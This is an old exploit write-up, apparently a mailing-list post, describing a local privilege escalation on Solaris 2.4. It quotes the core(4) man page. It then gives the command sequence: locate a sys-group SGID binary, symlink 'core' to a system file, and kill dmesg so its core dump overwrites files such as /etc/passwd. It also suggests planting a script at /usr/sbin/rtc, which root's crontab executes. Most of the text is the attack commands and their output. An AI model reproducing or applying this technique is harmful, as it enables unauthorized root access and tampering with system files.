

    Solaris 2.4


core(4)                   File Formats                    core(4)
     core - core image file
     The operating system writes out a core image  of  a  process
     when  it  is  terminated due to the receipt of some signals.
     The core  image  is  called  core  and  is  written  in  the
     process's  working  directory  (provided  it  can be; normal
     access controls apply).  A process with an effective user ID
     different  from  the  real  user  ID will not produce a core

    NOTICE the last phrase !!

    A PROCESS with an effective  user ID different from the  real user
    ID  will  NOT  produce  a  core  image  . That's very important in
    Security phase .  If such systmem be not SET , We can make a  core
    file anywhere ....   Just killing the  signal .. (  U knows why  i
    use the term KILL )..

    [cosmos:beren] uname -a
    SunOS cosmos 5.4 Generic_101945-32 sun4m sparc
    [cosmos:beren] ls -ald /etc
       8 drwxrwxr-x  25 root     sys         3584  7 ?y  25 @O   18:46 /etc/
    [cosmos:beren] ls -ald /usr
       2 drwxrwxr-x  30 root     sys         1024  7 ?y   5 @O   17:26 /usr/
    [cosmos:beren] ls -ald /usr/sbin
      10 drwxrwxr-x   4 root     bin         4608  5 ?y  18 @O   03:38 /usr/sbin/
    [cosmos:beren] ls -ald /usr/sbin
      10 drwxrwxr-x   4 root     bin         4608  5 ?y  18 @O   03:38 /usr/sbin/

    ****  It's GROUP WRITABLE !!  *****

    Most of u guys know what I about to say ..
    Main Idea is ..

    [cosmos:beren] find /usr -perm -2000 \( -group sys -o -group bin \) -ls

    [cosmos:beren] ls -al /usr/sbin/dmesg
      12 -r-xr-sr-x   1 bin      sys         5520 1994  Jul 15 /usr/sbin/dmesg*

    It's sys SGIDed.

    [cosmos:beren] ln -s /etc/SOMETHING core
    [cosmos:beren] stty ^\^\
    [cosmos:beren] pwd
    [cosmos:beren] dmesg
    /* then slightly after u type this command kill it . using stty ^\^\
       there comes the following results */
    ^C (Core dumped)
    [comos:beren] ls /etc/SOMETHING

    like this way u can  overwrite /etc/passwd or do any  operation on
    them.   if u  runs sparc  Zolaris 2.4  look at  the root's crontab
    file .  see it ..! definately it contains the next phrase ..

    # The rtc command is run to adjust the real time clock if and when
    1 2 * * * [ -x /usr/sbin/rtc ] && /usr/sbin/rtc -c >/dev/null 2>&1

    rtc is used in  zolaris x86.  so  u can make /usr/sbin/rtc  as the
    exploitation script . and can do anythin.


    I don't know sun made a patch on this effect.  It doesn't work  on
    Solaris 2.5 .. I tested it.